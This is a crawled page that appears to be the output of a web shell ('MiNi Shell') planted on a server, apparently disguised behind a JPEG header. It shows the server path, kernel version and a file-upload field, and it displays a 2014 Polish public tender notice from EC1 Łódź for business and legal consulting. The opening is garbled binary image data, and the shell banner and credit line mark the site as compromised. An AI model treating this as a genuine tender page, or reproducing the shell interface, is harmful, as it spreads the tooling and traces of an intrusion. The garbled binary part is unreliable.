JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141217/260517-N-2014.html

<p class="kh_header"><b>Łódź: Doradztwo biznesowo - prawne w zakresie opracowania analiz rynkowych oraz przygotowania i przeprowadzenia procedur 
dla wyłonienia operatora Kompleksu Studyjnego i  pomieszczeń towarzyszących w EC-1 Wschód</b><br>
<b>Numer ogłoszenia: 260517 - 2014; data zamieszczenia: 17.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "EC1 Łódź-Miasto Kultury" w Łodzi , ul. Targowa 1/3, 90-022 Łódź, woj. łódzkie, tel. 42 638 59 53, faks 42 638 59 58.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Doradztwo biznesowo - prawne w zakresie opracowania analiz rynkowych oraz przygotowania i przeprowadzenia procedur 
dla wyłonienia operatora Kompleksu Studyjnego i  pomieszczeń towarzyszących w EC-1 Wschód.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest kompleksowe doradztwo w zakresie biznesowo - prawnym, obejmujące  w szczególności:
a) analizę możliwości realizacji przedsięwzięcia w opisanym modelu biznesowym,
b) zdefiniowanie całości zadań wykonywanych przez operatora KS,
c) rekomendacje sposobu i trybu wyłonienia operatora,
d) określenie warunków i zasad współpracy pomiędzy operatorem, a EC1 oraz ewentualnymi innymi najemcami lub dzierżawcami pomieszczeń w tym budynku,
e) przygotowanie koniecznej dokumentacji.
2. W szczególności do zadań Wykonawcy należeć będzie:
1) Szczegółowe określenie zadań wykonywanych przez operatora zewnętrznego, zwłaszcza w świetle Wniosku o dofinansowanie projektu pn. Rewitalizacja EC-1 i jej adaptacja na cele kulturalno - artystyczne, zwanego dalej Projektem, oraz odnosząc się do opracowań oraz opinii, którymi dysponuje Zamawiający, w szczególności w kontekście świadczenia usług ogólnego interesu gospodarczego (UOIG).
2) Przygotowanie prezentacji (w wersji edytowalnej w narzędziu  MS Power Point) dla potencjalnych operatorów KS, w językach polskim i angielskim, 
3) Analiza rynku potencjalnych operatorów dla KS.
4) Zaproponowanie wzorców (benchmarków) rynkowych, koniecznych dla określenia zyskowności operatorów oraz opracowanie metodyki oceny tej zyskowności,
5) Określenie sposobu oraz trybu wyboru operatora KS.
6) Określenie zasad i wysokości rozliczeń z tytułu świadczenia przez operatora UOIG.
7) Określenie obowiązków operatora zewnętrznego, w szczególności w zakresie UOIG -w tym zakres UOIG oraz wytyczne dla operatorów do przygotowania programu merytorycznego oraz wytyczne odnośnie wysokości kosztów świadczenia UOIG oraz rekomendowania wysokość opłat za korzystanie z nich.
8) Określenie zasad kontroli i egzekwowania realizacji obowiązków przez operatora zewnętrznego.
9) Określenie zasad współpracy z innymi podmiotami obecnymi lub w przyszłości obecnymi w budynku EC-1 Wschód.
10) Opracowanie opisu przedmiotu zamówienia na wybór operatora zewnętrznego, warunków udziału w postępowaniu oraz kryteriów oceny ofert, uwzględniających następujące czynniki:
a) wysokość czynszu dzierżawnego,
b) wysokość wynagrodzenia z tytułu UOIG,
c) zakres UOIG,
d) wartość sprzętu, wyposażenia i aranżacji  pomieszczeń, 
e) inne kryteria zaproponowane przez Wykonawcę.
11) W ramach realizacji przedmiotu umowy będą odbywać się spotkania, w których obowiązani są uczestniczyć osoby wskazane przez Wykonawcę w Wykazie osób, stanowiącym załącznik do oferty. Spotkania takie będą miały miejsce na wniosek Zamawiającego, w liczbie co najmniej 6 spotkań. Nie wyklucza to możliwości prowadzenia korespondencji drogą telefoniczną i poprzez pocztę elektroniczną. 
12) Ponadto w ramach zamówienia podstawowego Wykonawca może się zobowiązać do świadczenia .dodatkowych godzin konsultacji.  Liczba dodatkowych godzin konsultacji określa Wykonawca w formularzu oferty, przy czym konsultacje będą:
a) świadczone na żądanie Zamawiającego w jego siedzibie,
b) świadczone przez osoby spośród desygnowanych do realizacji zamówienia, tj. wskazane w Wykazie osób,
c) liczba godzin konsultacji liczona zegarowo, (1 godzina = 60 minut),
d) świadczone w dni robocze Zamawiającego i w czasie od 8 do 16, w terminach określonych przez Zamawiającego i uzgodnionych z Wykonawcą.
W przypadku skorzystania przez Zamawiającego z prawa opcji Wykonawca będzie obowiązany do świadczenia dodatkowych godzin konsultacji w liczbie 50% godzin konsultacji wskazanych w ofercie.  (ponad liczbę obowiązkowych spotkań wskazanych w pkt 6) prawa opcji. 
Prawo opcji
Zamawiający zastrzega skorzystanie z prawa opcji do dnia 31 grudnia 2015 r.
W ramach prawa opcji Zamawiający zastrzega:
1) przygotowanie kompletnej dokumentacji niezbędnej do przeprowadzenia postępowania, którego celem jest wybór operatora i zawarcia z nim umów określających zakres i warunki współpracy w zakresie realizacji zadań merytorycznych w EC1- Wschód w zakresie KS, obejmującej w szczególności: 
a) oszacowanie wartości zamówienia zgodnie z ustawą Prawo zamówień publicznych (Pzp) lub innymi przepisami w przypadku, gdy wybór operatora zewnętrznego będzie dokonywany w oparciu o inne przepisy niż ustawa Pzp,
b) aktualizację opisu przedmiotu zamówienia zgodnie z właściwymi przepisami prawa, mającymi zastosowanie w danym postępowaniu na wybór operatora zewnętrznego oraz wzorów umów dla operatora zewnętrznego, zawierających w szczególności metodykę obliczania wysokości wynagrodzenia z tytułu świadczenia UOIG, klauzulę claw-back, zasady użytkowania i utrzymania infrastruktury, ponoszenia w nich nakładów inwestycyjnych oraz wydatków bieżących oraz inne elementy niezbędne w przypadku umów z operatorem zewnętrznym, prowadzącym działalność z wykorzystaniem infrastruktury publicznej,
2) w zależności od wybranego trybu postępowania czynne uczestnictwo we wszystkich jego etapach polegające m.in. na udziale w pracach komisji przetargowej w charakterze eksperta,
3) udział w czynnościach zamawiającego, wykonywanych w ramach procedury, obejmujących w szczególności:
a) przygotowanie projektów odpowiedzi i wyjaśnień na pytania zadawane przez zainteresowanych wykonawców,
b) przygotowanie projektów modyfikacji SIWZ w związku z zadawanymi przez wykonawców pytaniami,
c) badanie wniosków o dopuszczenie do udziału w postępowaniu oraz ofert (jeżeli postępowanie będzie prowadzone w trybie z takim etapem),
d) przygotowanie projektów wezwań do uzupełnień i/lub wyjaśnień treści wniosków o dopuszczenie do udziału w postępowaniu oraz ofert,
e) ocena udzielonych wyjaśnień i/lub uzupełnień i złożenie stosownych rekomendacji,
f) przygotowanie projektów wykluczenia wykonawcy wraz z uzasadnieniem faktycznym i prawnym,
g) przygotowanie propozycji wezwań do wyjaśnienia treści oferty i/lub do uzupełnień oferty,
h) przygotowanie projektów poprawienia błędów popełnionych przez wykonawców w ofercie,
i) przygotowanie wezwania do wyjaśnień w zakresie rażąco niskiej ceny oferty,
j) ocena udzielonych wyjaśnień i uzupełnień w zakresie opisanym w lit. g) i i),
k) ocena ofert w poszczególnych kryteriach w tym analiza proponowanych rozliczeń z tytułu świadczenia UOIG,
l) przygotowanie projektów odrzucenia oferty wraz z uzasadnieniem faktycznym 
i prawnym,
m) przygotowanie projektów wyboru  najkorzystniejszej oferty,
n) przygotowanie informacji o wyniku postępowania,
o) udział po stronie Zamawiającego w postępowaniach przed KIO lub sądami powszechnymi wszczętymi w związku z wyborem operatora (maksymalna ilość postępowań arbitrażowych lub przed sądami powszechnymi łącznie 1, w przypadku połączenia spraw do wspólnego rozpoznawania sprawy połączone sprawy traktuje się jako jedno postępowanie), 
4) udział w innych czynnościach Zamawiającego, związanych z prowadzoną procedurą, a w szczególności:
a) przygotowanie projektów aktów prawa miejscowego, jeśli tego rodzaju regulacje prawne okażą się niezbędne dla prawidłowego przeprowadzenia postępowań 
na wybór operatorów, 
b) doradztwo w procedurze odwoławczej polegające na przygotowaniu projektów odpowiedzi na ewentualne odwołanie.
5) W przypadku zarekomendowania innego sposobu wyboru operatora niż przepisy ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, postanowienia 
pkt. 1-4 prawa opcji stosuje się odpowiednio.
6) W ramach realizacji przedmiotu zamówienia w zakresie prawa opcji będą odbywać się spotkania, w których obowiązani są uczestniczyć osoby wskazane przez Wykonawcę w Wykazie osób, stanowiącym załącznik do oferty. Spotkania takie będą miały miejsce na wniosek Zamawiającego, nie częściej niż dwa razy w miesiącu. Nie wyklucza to możliwości prowadzenia korespondencji drogą telefoniczną i poprzez pocztę elektroniczną. Ponadto będą prowadzone  dodatkowe konsultacje w liczbie 50% godzin konsultacji wskazanych w ofercie.  
3. Wykonawca przekaże Zamawiającemu wykonany przedmiot umowy (dotyczy także odpowiednio prawa opcji) w formie pisemnej (w 3 egzemplarzach) oraz na nośniku CD/DVD (w 3 egzemplarzach). Opracowanie w wersji elektronicznej powinno być wykonane w następujących formatach:
- opracowanie: *pdf (umożliwiający edycję) oraz
- pliki tekstowe: *doc lub *docx,
- prezentacja: *ppt lub *pptx, 
- arkusze obliczeniowe: *xls lub *xlsx,
- pliki graficzne *jpg o rozdzielczości nie mniejszej niż 300 dpi, (powinny także umożliwiać poprawne odczytanie zawartych tam informacji).
4. W formie pisemnej, wszystkie strony poszczególnych opracowań muszą być ponumerowane oraz połączone w sposób trwały (Zamawiający dopuszcza podział opracowań na tomy). Każde opracowanie musi zawierać indeks-spis treści zawierający informacje o zawartości danego opracowania/tomu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.00.00.00-4, 79.31.10.00-0, 79.41.00.00-1, 79.41.10.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy wymaga wniesienia wadium w kwocie 3000,00 zł (trzy tysiące złotych). Szczegółowe informacje o wadium znajdują się w Specyfikacji Istotnych Warunków Zamówienia</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób oceny spełnienia warunku - wykonawca zobowiązany jest wykazać, 
że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonuje wykonał: 
a) co najmniej dwa opracowania z zakresu analizy atrakcyjności inwestycyjnej lub pozyskiwania inwestorów o wartości każdej usługi przekraczającej 50 tys. PLN brutto oraz
b) co najmniej dwa opracowania z zakresu analiz rynkowych, i/lub analiz studialnych dla inwestycji kubaturowych w rewitalizowanych obiektach tj. w szczególności opracowanie koncepcji lub biznes planu, z zaprojektowaniem nowego sposobu wykorzystania nieruchomości o wartości każdej usługi przekraczającej 50 tys. PLN brutto oraz 
c) co najmniej trzech opracowań z zakresu zagadnień występowania pomocy publicznej lub usług ogólnego interesu gospodarczego oraz 
d) co najmniej jednego opracowania, którego przedmiotem było przygotowanie umowy dzierżawy lub najmu dla klientów (wynajmujących) korzystających z pomocy publicznej oraz
e) co najmniej jednego opracowania, którego przedmiotem była analiza rynku usług kulturalnych o wartości usługi co najmniej 100 tys. PLN brutto.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób oceny spełnienia warunku- 
Wykonawca zobowiązany jest wykazać, że posiada: środki finansowe w kwocie 100 000,00 zł lub posiada zdolność kredytową w takiej wysokości;
Wykonawca zobowiązany jest wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia, w wysokości 100 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - dodatkowe godziny konsultacji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Szczegółowy wykaz zmian postanowień umowy znajduje się w Specyfikacji Istotnych Warunków Zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ec1lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ec1 Łódź Miasto Kultury
ul. Targowa 1/3
90-022 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2014 godzina 12:15, miejsce: Ec1 Łódź Miasto Kultury
ul. Targowa 1/3
90-022 Łódź
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający zastrzega sobie skorzystanie z prawa opcji do dnia 31.12.2015 r. Szczegóły dotyczące prawa opcji znajdują się w Specyfikacji Istotnych Warunków Zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com